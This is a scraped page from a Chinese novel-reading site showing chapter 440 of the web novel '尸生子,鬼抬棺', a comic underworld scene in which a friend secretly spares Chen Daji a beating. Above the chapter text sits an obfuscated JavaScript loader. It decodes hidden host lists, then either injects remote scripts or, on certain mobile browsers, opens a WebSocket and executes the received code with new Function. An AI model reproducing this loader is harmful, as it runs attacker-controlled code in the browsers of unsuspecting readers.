笔趣阁

字:
关灯 护眼
笔趣阁 > 尸生子,鬼抬棺 > 第440章 姥姥的消息
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第440章 姥姥的消息

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
陈大计这厮,此时正在阴阳界挨板子,手机自然是打不通的。
  退一万步讲,即使能打通,以他目前这种状态,陈大计也没心情接吧......
  “哎呀妈,疼死我啦!”
  “还有几下呢,咱、咱被打的,快憋不住屎了......”
  陈大计的小把戏,怎能瞒得过在场诸位高人。
  过阴过阴,来的就是三魂七魄、魂体本源。
  都没有肉身,哪里会有屎......
  于是行刑的两个鬼差只当听不见,继续噼里啪啦打的欢快。
  嘿,“鬼生之年"能有幸暴打少将军一顿,够和同僚吹一辈子了!
  旁人嘻嘻哈哈,看着阴阳界最大的祸害挨揍心情愉快,但是华九难不行。
  他是真的心疼,这个数次陪着自己出生入死的兄弟。
  听陈大计叫的凄惨,华九难将心一横,悄悄拿出一个刘掌柜送的小纸人儿,默念秘术“替身咒”。
  替身代身,白纸作面,五色纸作衣;
  开你左耳听阴俯,右耳听阳间;
  你和我府陈大计,同年同月同日生;
  开你左手挡万难,右手挡千灾;
  要刑刑大山,要克克大海,无刑无克担煞走,神兵火急如律令!
  随着咒语完成,陈大计忽然觉的板子打在自己身上,一点不疼了。
  非但如此,就是原来被打出的伤势,也瞬间痊愈。
  正在这货纳闷的时候,华九难的声音在他耳边响起。
  “大计别愣着,继续喊疼!”
  陈大计虽然平时稀里糊涂,但关键时刻还不算傻。
  立即明白是华九难,不知用了什么办法帮了自己。
  于是自然配合,扯开破锣般的嗓子继续“惨嚎”。
  “哎呀妈呀好疼啊!”
  “屁股都干碎啦!”
  喊了几声可能是累了,于是急中生智嗷了一嗓子。
  “啊,我晕啦!”
  随后趴在地上一动不动,开始装死。
  事实证明,你永远猜不到陈大计下一步会做什么。
  这厮装晕不久,居然趴着睡着了。
  你老实睡觉也行,没事打什么呼噜。
  打呼噜也不怕,还特么非要打的惊天动地,就连阴差刻意加强的板子声都掩盖不住......
  书中暗表:
  其实崔府君、赐福镇宅圣君、七爷八爷还有其余阴帅,在华九难出手的时候就察觉到了。
  只是没有人说破而已。
  一来是给华九难这位至人皇族的面子,日后相见有个人情;
  二来这些阴司大神,也没真心和陈大计过不去,只是心中有股“怨气”,玩闹发泄一下。
  可任谁都万万没想到,“少将军”居然有这种骚操作!
  如雷的鼾声回荡在奈何桥头,所有人都尴尬极了......
  脾气急爽的八爷瞬间大怒,一拍案上惊堂木。
  “左右何在,把堂下这厮给本帅叉起来!”
  阴差得令,两根木杖往陈大计腋下一插,猛的用力将这货支了起来。
  那样子,像极了绑在架子上的蛤蟆。
  可惜,有些人就是这样,“死到临头”了还后知后觉。
  陈大计揉着睡眼迷蒙的死鱼眼睛,嘟嘟囔囔问道。
  “咋滴了,叫我干啥?开饭了啊?!”
  眼见着八爷范无咎脸色越来越黑,华九难赶忙上前一步抱拳行礼。
  “还请范先生息怒!”
  “我兄弟他身体过于单薄,重刑之下才会在公堂上犯了糊涂!”
  范八爷还要说什么,却被谢七爷暗中拉住。
  这时候不用较真,又不是想真把少将军怎么样。
  正好借着华九难的说辞“顺坡下驴”,还能再给至人皇族一个面子。
  “既然‘要犯’已然伏法,那今日就不再责罚!”
  “先宣布过阴一事最终定论......”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师